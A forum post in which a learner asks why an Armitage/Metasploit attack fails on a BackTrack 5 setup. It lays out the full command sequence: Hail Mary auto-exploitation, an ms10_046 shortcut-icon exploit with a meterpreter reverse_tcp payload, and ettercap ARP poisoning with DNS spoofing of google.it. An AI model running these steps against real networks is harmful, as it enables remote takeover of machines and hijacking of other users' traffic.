Hi guys, i hope that 1 of you can help me with a exploit of armitage on backtrack 5 R1 32 bit (virtual machine).
I open this thread because i don't found manual or other thread on the websites.
I wanna know which problem has my armitage and why i can not attack the target.
Armitage has been started but there are warning message and i don't like this.
I write step by step:

BACKTRACK IP 192.168.1.6
TARGET IP 192.168.1.8


1. STEP

root@bt:~#/etc/init.d/mysql start

Rather than invoking init scripts through /etc/init.d, use the service(8)
utility, e.g. service mysql start

Since the script you are attempting to invoke has been converted to an
Upstart job, you may also use the start(8) utility, e.g. start mysql
mysql start/running, process 2871

(I don't see problem here)

2. STEP

root@bt:~#msfrpcd -f -U msf -P test -t Basic
[*] XMLRPC starting on 0.0.0.0:55553 (SSL):Basic...[*] XMLRPC ready at 2011-10-07 12:06:51 +0200.

(I don't see problem here)

3. STEP

root@bt:~#armitage

Warning: /root at preferences.sl:309
Doing a secure socket!
Warning: No collaboration server is present! at collaborate.sl:94
Warning: Writing to: /root at armitage.sl:201

(Now armitage are been started, but there are this warning messages)

4. STEP

Click Hosts ---> Nmap Scan ---> Quick Scan (OS detect)

I write the ip address of my target:

192.168.1.8

Click Ok, Nmap start the scan and when finish i see the host.

(I don't see problem here)

5. STEP

I click over the host and then Attack ---> Find Attacks ---> by port

When this is complete i see the exploit if right click over target host.

Attack ---> Hail Mary ---> by port

When this is complete, Hail Mary report this:

1) Finding exploits (via db_autopwn)

[192.168.1.8] Found 16 exploits

2) Sorting Exploits

3) Launching Exploits



4) Listing sessions

msf > sessions -v

Active sessions
===============

No active sessions.

(Here, the 16 exploit founded have not hit the target but i don't understand the reason)

6. STEP

Now i've think that if i make a DNS spoofing attack its good to send the target over my server "ms10_046_shortcut_icon_dllloader" with payload "windows/meterpreter/reverse_tcp" and...

Attack ---> Browser Attacks ---> Windows ---> ms10_046_shortcut_icon_dllloader

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
meterpreter > set LHOST 192.168.1.6
LHOST => 192.168.1.6
msf exploit(ms10_046_shortcut_icon_dllloader) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms10_046_shortcut_icon_dllloader) > set TARGET 0
TARGET => 0
msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 0.0.0.0
SRVHOST => 0.0.0.0
msf exploit(ms10_046_shortcut_icon_dllloader) > set URIPATH /
URIPATH => /
msf exploit(ms10_046_shortcut_icon_dllloader) > exploit -j[*] Exploit running as background job.[*] [*] Send vulnerable clients to \\192.168.1.6\PDcC\.[*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk[*] [*] Using URL: BackTrack Linux - Penetration Testing Distribution[*] Local IP: http://192.168.1.6:80/[*] Server started.

Ok, now i need to send the target to this address: \\192.168.1.6\PDcC\
The question is: CAN I USE DNS SPOOFING? I think yes. If "www.google.it" its my address: 192.168.1.6 and he write Google, he come over my server and i take the control.

(I don't see problem here)

7. STEP

I open other shell and:

root@bt:~#nano /usr/share/ettercap/etter.dns

And i replace this:

google.it A 192.168.1.6
*.google.it A 192.168.1.6
Google PTR 192.168.1.6

Then i save and close and i start the DNS SPOOFING:

root@bt:~# ettercap -T -q -i eth0 -P dns_spoof -M arp // //

(I don't see problem here)

8. STEP

Check of armitage:
[*] Sending UNC redirect to 192.168.1.8:1076 ...

Check of ettercap textual mode:

dns_spoof: [www.google.it] spoofed to [192.168.1.6]

Check of target host browser:

Google

is:

http://www.google.it/\\192.168.1.6\5CPDcC\

(The problem here its the bad ridirect)

END...

I don't understand why the ridirect its: http://www.google.it/\\192.168.1.6\5CPDcC\ and if there are WARNING MESSAGES, or other problem that i need to fix. Thanks for patience.